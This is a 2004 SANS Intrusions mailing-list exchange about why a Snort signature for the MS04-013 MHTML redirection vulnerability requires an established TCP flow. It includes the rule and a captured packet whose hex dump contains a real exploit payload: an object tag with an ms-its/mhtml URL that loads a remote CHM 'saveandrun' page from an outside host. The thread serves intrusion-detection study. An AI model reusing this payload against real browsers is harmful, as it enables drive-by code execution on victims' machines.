[Intrusions] mhtml signature

Joshua Berry jberry at PENSON.COM
Wed Aug 4 17:06:53 GMT 2004 

This is a TCP based connection and that is why the signature looks for
an established connection.  This helps to reduce false positives and
also protects against attacks from scripts like Snot that do not
actually complete the 3-way handshake.  This attack will only succeed if
the 3-way handshake is completed because data cannot be transferred
until that point.

-----Original Message-----
From: intrusions-bounces at lists.sans.org
[mailto:intrusions-bounces at lists.sans.org] On Behalf Of lola marais
Sent: Wednesday, August 04, 2004 7:18 AM
To: intrusions at lists.sans.org
Subject: [Intrusions] mhtml signature

I have been working on a problem and require the assistance of the
broader 
list community.
Credit is given to the owner of this signature at 
http://sourceforge.net/mailarchive/message.php?msg_id=7758516


I am planning on using this signature for a detect in part 2 my GCIA 
practical.

The problem is that I am not able to get it working 100% with the data
that 
i have. By not working I mean that it will miss the single packet that I

have captured.

I have captured some data from a network using tcpdump. The capture
contains 
the data content required to trigger the event. The capture contains a 
single packet for that session, no more.

When I read the data past snort with the signature enabled, then NO
alerts 
are triggered. If I remove the part of the signature 
"flow:from_server,established" and then pass the same data I have 1
event

The signature looks for an established connection.
My question is:

1. Why has the author of the signature decide to look for an established

connection?
2. Does the signature stand a chance of missing some events by looking
only 
for established connections?

The current version of the signature has the following structure.

alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL Redirection

Attempt"; flow:from_server,established; content:"mhtml|3A|file|3A|";
nocase; 
reference:cve,CAN-2004-0380; 
reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx; 
classtype:web-application-attack; rev:2;)

The data packet that I have captured looks as follows:

07/28/04-11:23:51.262652 MAC:removed -> MAC:removed type:0x800 len:0xC2
Proxy:ProxyPort -> InternalHost:4003 TCP TTL:63 TOS:0x0 ID:33030
IpLen:20 
DgmLen:176 DF
***AP**F Seq: 0xDC274ADF  Ack: 0x2B3B3965  Win: 0xC1E8  TcpLen: 20
0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00
..BB....2..q..E.
0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6
.... at .?.+.......
0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19
.R.L...'J.+;9eP.
0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63  ..p...
<objec
0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D  t
data="&#109;s-
0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F
its:mhtml:file:/
0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70
/C:\foo.mht!http
0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F
://www.<blocked> 
free32.co
0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65
m/POP.CHM::/save
0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65  andrun.htm"
type
0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C
="text/x-scriptl
0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F  et"></object>
..
0x00C0: CA 27                                            .'

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Death to pop-up ads! Get the ultimate toolbar today. 
http://toolbar.msn.co.za?DI=1054&XAPID=2083

_______________________________________________
Intrusions mailing list
Intrusions at lists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions

More information about the Intrusions mailing list